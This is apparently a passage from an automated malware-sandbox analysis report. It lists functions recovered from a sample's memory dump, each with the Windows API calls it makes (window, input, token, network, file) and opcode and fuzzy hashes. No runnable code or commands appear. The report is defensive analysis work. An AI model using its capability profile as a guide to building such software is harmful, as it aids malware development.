                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                      • Opcode ID: ec86447f9d72d9e5978449d103089b628fd16387315a0774234e139db2860900
                                                                                                                                                                      • Instruction ID: 36f3f5600d1abcaa930d8fcb374a1961dae00db488a8cf17efb3dd650ba245c3
                                                                                                                                                                      • Opcode Fuzzy Hash: ec86447f9d72d9e5978449d103089b628fd16387315a0774234e139db2860900
                                                                                                                                                                      • Instruction Fuzzy Hash: 90314632A40218BFEF378A65AC05BFABBBAAB49310F04471BF580927D1C3358A85D751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003A6415, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003A644B
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 003A6479
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003A64A7
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003A64DD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      • Opcode ID: 8b45d28d112ec206a91dff4edd093c700d4bb8c1b3b52a477feb37fb157891dd
                                                                                                                                                                      • Instruction ID: b8d67ca13589feb9148528b9d5266c5955b6ed8f9743c14311138aa50fc7337e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b45d28d112ec206a91dff4edd093c700d4bb8c1b3b52a477feb37fb157891dd
                                                                                                                                                                      • Instruction Fuzzy Hash: C331C131600246AFDF238F66C846BBA7BA9FF4A310F1A4029E8558B191E731D850DB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F5175, Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 003F5189
                                                                                                                                                                        • Part of subcall function 003D387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003D3897
                                                                                                                                                                        • Part of subcall function 003D387D: GetCurrentThreadId.KERNEL32 ref: 003D389E
                                                                                                                                                                        • Part of subcall function 003D387D: AttachThreadInput.USER32(00000000,?,003D52A7), ref: 003D38A5
                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 003F519A
                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 003F51D5
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 003F51DB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                      • Opcode ID: e9485db70b4aa47b26e4613cac019b093105e557578ab6a2d9878ffde9ef275e
                                                                                                                                                                      • Instruction ID: 1bc73a520ee7d1b6cf057a88c27010e19a76e9c7589a7c7638ea567c62935bcb
                                                                                                                                                                      • Opcode Fuzzy Hash: e9485db70b4aa47b26e4613cac019b093105e557578ab6a2d9878ffde9ef275e
                                                                                                                                                                      • Instruction Fuzzy Hash: 40312F71900108AFDB11EFA5C885EEFB7FDEF98300F10816AE515EB251DA759E05CBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FC788, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • GetCursorPos.USER32(?,?,?,?,?,?,?,?,003ABBFB,?,?,?,?,?), ref: 003FC7C2
                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003ABBFB,?,?,?,?,?), ref: 003FC7D7
                                                                                                                                                                      • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,003ABBFB,?,?,?,?,?), ref: 003FC824
                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003ABBFB,?,?,?), ref: 003FC85E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                      • Opcode ID: d38f2d7b91476c36b0fed13a125670c26010f6a6c976badc5de042b761e58064
                                                                                                                                                                      • Instruction ID: cc8acca9f04cb4a8bcfac62e3bb6f78aad533555814511e626158248856dd21b
                                                                                                                                                                      • Opcode Fuzzy Hash: d38f2d7b91476c36b0fed13a125670c26010f6a6c976badc5de042b761e58064
                                                                                                                                                                      • Instruction Fuzzy Hash: 4931713560001CAFCB16DF58C998EFA7BBAEF49350F054069FA098B261C7359D50DF64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8B9E, Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003C8669
                                                                                                                                                                        • Part of subcall function 003C8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003C8673
                                                                                                                                                                        • Part of subcall function 003C8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003C8682
                                                                                                                                                                        • Part of subcall function 003C8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003C8689
                                                                                                                                                                        • Part of subcall function 003C8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003C869F
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003C8BEB
                                                                                                                                                                      • _memcmp.LIBCMT ref: 003C8C0E
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003C8C44
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 003C8C4B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1592001646-0
                                                                                                                                                                      • Opcode ID: 0f038a4c49d967439b1ff15952079541214ea72690a430af3d19180bfe67773d
                                                                                                                                                                      • Instruction ID: 947b9a3c93ffde4489d48fb3bbc08208bedf185ce84514099acad31fce2f3512
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f038a4c49d967439b1ff15952079541214ea72690a430af3d19180bfe67773d
                                                                                                                                                                      • Instruction Fuzzy Hash: AB216972E02209AFDB11DFA4C985FEEB7B8EF44355F158059E954AB240DB31AE06CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E1A5B, Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003E1A97
                                                                                                                                                                        • Part of subcall function 003E1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003E1B40
                                                                                                                                                                        • Part of subcall function 003E1B21: InternetCloseHandle.WININET(00000000), ref: 003E1BDD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1463438336-0
                                                                                                                                                                      • Opcode ID: a1fe237eda7f26af58f64f78af204b30bb4edda1834e338972f99105a3da9c3e
                                                                                                                                                                      • Instruction ID: 3eafbe874fc0f9fd2725abb9d0a43bc1e7b8c37d610609350a57a58e4f3abd83
                                                                                                                                                                      • Opcode Fuzzy Hash: a1fe237eda7f26af58f64f78af204b30bb4edda1834e338972f99105a3da9c3e
                                                                                                                                                                      • Instruction Fuzzy Hash: 5721A435204651BFDB139F628C01FBBB7ADFF44701F11021AFA1296691E771E815D790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D3C66, Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,003FFAC0), ref: 003D3CA0
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 003D3CAF
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 003D3CBE
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003FFAC0), ref: 003D3D1B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2267087916-0
                                                                                                                                                                      • Opcode ID: d54ead89f2da62a09c9ef09c89290e51cd56f207461999e62b98e0afa372f3b6
                                                                                                                                                                      • Instruction ID: 9c751b25fbd16ad5290271e481fdceb0cfcc796cd8fd12bd88069554985733cd
                                                                                                                                                                      • Opcode Fuzzy Hash: d54ead89f2da62a09c9ef09c89290e51cd56f207461999e62b98e0afa372f3b6
                                                                                                                                                                      • Instruction Fuzzy Hash: 3021B5759093019F8712DF28D88086A77E8EE55364F144A2EF499C73A1D730DE46CF93
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CE1AF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003CF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003CE1C4,?,?,?,003CEFB7,00000000,000000EF,00000119,?,?), ref: 003CF5BC
                                                                                                                                                                        • Part of subcall function 003CF5AD: lstrcpyW.KERNEL32 ref: 003CF5E2
                                                                                                                                                                        • Part of subcall function 003CF5AD: lstrcmpiW.KERNEL32(00000000,?,003CE1C4,?,?,?,003CEFB7,00000000,000000EF,00000119,?,?), ref: 003CF613
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,003CEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 003CE1DD
                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 003CE203
                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,003CEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 003CE237
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                      • Opcode ID: 62f63b9cd6e29193d5570794048ddd7b6c6951d3ea6795e2bd5ba8a0ced356e8
                                                                                                                                                                      • Instruction ID: 557587b3814d8198a617f9d73529e65fefcd760305ed646daf78184d78dcf676
                                                                                                                                                                      • Opcode Fuzzy Hash: 62f63b9cd6e29193d5570794048ddd7b6c6951d3ea6795e2bd5ba8a0ced356e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 0011BE3A200345EFCB26AF64D845F7A77ADFF85350B40452AE916CB260EB719C50D7A0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003A5332, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 003A5351
                                                                                                                                                                        • Part of subcall function 0039594C: __FF_MSGBANNER.LIBCMT ref: 00395963
                                                                                                                                                                        • Part of subcall function 0039594C: __NMSG_WRITE.LIBCMT ref: 0039596A
                                                                                                                                                                        • Part of subcall function 0039594C: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,?,?,?,?,00391013,?,0000FFFF), ref: 0039598F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                      • Opcode ID: 6eed8cf87deb8131173bb5d60f5f04440fd386da4bba5c0c0d9318cfaf6a95eb
                                                                                                                                                                      • Instruction ID: 4cd348c1f6f333d88d581ae7d523717348ebf69548c8958f3bd9695c43a328ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 6eed8cf87deb8131173bb5d60f5f04440fd386da4bba5c0c0d9318cfaf6a95eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A11CE76505A15AFCF233F74A84476A3798EF963A0F21042AF9459A1E0DAB58A408790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D40B1, Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003D40D1
                                                                                                                                                                      • _memset.LIBCMT ref: 003D40F2
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 003D4144
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003D414D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1157408455-0
                                                                                                                                                                      • Opcode ID: f47b11f3ce84d2fc969d82f476a714b54a35f0e98c66d4dd806a8bb516fe20e8
                                                                                                                                                                      • Instruction ID: da0c4ea4248cec31148ea226abe81daad4594efd44feb00bf01a14598b37315d
                                                                                                                                                                      • Opcode Fuzzy Hash: f47b11f3ce84d2fc969d82f476a714b54a35f0e98c66d4dd806a8bb516fe20e8
                                                                                                                                                                      • Instruction Fuzzy Hash: D511CA769012287AD7319BA5AC4DFBBBB7CEF44760F1045AAF908D7280D6744E80CBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E667C, Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00375B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003D7B20,?,?,00000000), ref: 00375B8C
                                                                                                                                                                        • Part of subcall function 00375B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003D7B20,?,?,00000000,?,?), ref: 00375BB0
                                                                                                                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 003E66AC
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E66B7
                                                                                                                                                                      • _memmove.LIBCMT ref: 003E66E4
                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 003E66EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1504782959-0
                                                                                                                                                                      • Opcode ID: c8934c80efda02f69e8230414a8b7e7ece6aec9ce40cbece70cf5f0d85ca6c46
                                                                                                                                                                      • Instruction ID: 2a30d24d4d339c6b80fec18b40934bb1078dc3e12280574281140159c91c9a55
                                                                                                                                                                      • Opcode Fuzzy Hash: c8934c80efda02f69e8230414a8b7e7ece6aec9ce40cbece70cf5f0d85ca6c46
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B118675900509AFCB06FBA4DD86DEE77BCEF14310B148165F506AB2A1DF70AE04CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C9023, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003C9043
                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003C9055
                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003C906B
                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003C9086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: 56497ff1f2dff5103b1ee4b2552b66cbacabc825f4e7a3c6a5d84d4d0fe9f36e
                                                                                                                                                                      • Instruction ID: 94f34f54aa7c9762971a0e5ac6dcd61bd4ccc0210ae224970588f98550c80b9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 56497ff1f2dff5103b1ee4b2552b66cbacabc825f4e7a3c6a5d84d4d0fe9f36e
                                                                                                                                                                      • Instruction Fuzzy Hash: E7114C79900218FFDB11DFA5CD84FADBB78FB48310F214096E904B7250D6716E10DB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00371290, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 003712D8
                                                                                                                                                                      • GetClientRect.USER32 ref: 003AB84B
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 003AB855
                                                                                                                                                                      • ScreenToClient.USER32 ref: 003AB860
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                      • Opcode ID: 81c0131a678099c4b16973577efdac25a429de10cff99b611b739dc4f4cd12a0
                                                                                                                                                                      • Instruction ID: c324ada6c64b098c7d815d669788c768dbde4e2d8f0d4d88d7ff945be4c4d94d
                                                                                                                                                                      • Opcode Fuzzy Hash: 81c0131a678099c4b16973577efdac25a429de10cff99b611b739dc4f4cd12a0
                                                                                                                                                                      • Instruction Fuzzy Hash: A8112B36500019BFCB22EF98D8859BE77BCEF09301F008856F955E7251C734AA55CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D1652, Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003D01FD,?,003D1250,?,00008000), ref: 003D166F
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003D01FD,?,003D1250,?,00008000), ref: 003D1694
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003D01FD,?,003D1250,?,00008000), ref: 003D169E
                                                                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,003D01FD,?,003D1250,?,00008000), ref: 003D16D1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                      • String ID:
